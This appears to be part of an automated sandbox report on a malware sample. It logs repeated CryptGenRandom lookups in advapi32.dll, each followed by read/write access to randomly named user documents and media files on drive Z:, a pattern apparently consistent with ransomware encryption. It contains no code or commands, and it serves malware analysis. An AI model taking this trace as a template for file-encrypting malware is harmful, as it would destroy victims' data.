| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\4yXte0uXIFucLv4.odt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ashgeHC2PQdqLQk7.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ashgeHC2PQdqLQk7.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZvphsNc.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZvphsNc.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Lp3sHpFPOeag.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Lp3sHpFPOeag.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\HCn2qrul7ygqoS.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\HCn2qrul7ygqoS.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1fn93wGZjdanZB.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\1fn93wGZjdanZB.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\dp9u7AdNvM4gE.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\dp9u7AdNvM4gE.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\FSEmJ5n1uMSloscL.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\FSEmJ5n1uMSloscL.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qCc7INt1lZdUfK.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\qCc7INt1lZdUfK.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\MR8b0p2eb.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\MR8b0p2eb.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\6FHTeIALuazFh6S.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\6FHTeIALuazFh6S.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Jo92bs8aTj1Vj0c.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Jo92bs8aTj1Vj0c.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pnOgbKINM1qNAlrGulmO.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\pnOgbKINM1qNAlrGulmO.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\tbDCg9D.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\tbDCg9D.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Sly3qKgO3ATm8o.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Sly3qKgO3ATm8o.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\spHYAF9ViIqM9vtOW.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\spHYAF9ViIqM9vtOW.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\d8qsFgy6NUR5eQtZvA.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\d8qsFgy6NUR5eQtZvA.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EONMy4FO98J1ipDWLzTP.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\EONMy4FO98J1ipDWLzTP.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\vDGdxB.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\vDGdxB.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ibePv6Lj2e91qk.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ibePv6Lj2e91qk.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9nXLd1stH.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\9nXLd1stH.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rmkutDE080.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\rmkutDE080.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Zco6FDtNcxUboIRnw.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\Zco6FDtNcxUboIRnw.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rp59XRK0hPQE.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\rp59XRK0hPQE.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\HPloVL0oZ.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\HPloVL0oZ.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\nucEj.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\nucEj.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\NjZEnmit.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\NjZEnmit.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rYQhITml8s4Mffbv10w.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\rYQhITml8s4Mffbv10w.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rKWXelaLEZJ.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\rKWXelaLEZJ.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\zvb7Mnw3iSwviEopdWc.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\zvb7Mnw3iSwviEopdWc.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\aHSgQEUnQ.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\aHSgQEUnQ.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EJbZxMj.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\EJbZxMj.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\AXHKm6GyRoXWvxAR1nK.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\AXHKm6GyRoXWvxAR1nK.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\aQV013X.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\aQV013X.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\IWEBAEoUidzls4DEURs.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\IWEBAEoUidzls4DEURs.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\3f8x8CrYapPiNap.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\3f8x8CrYapPiNap.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\QkLjJ0I.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\QkLjJ0I.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\z8zLOOgA3oe.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\z8zLOOgA3oe.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\gtMj5dvrEffpxCN.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
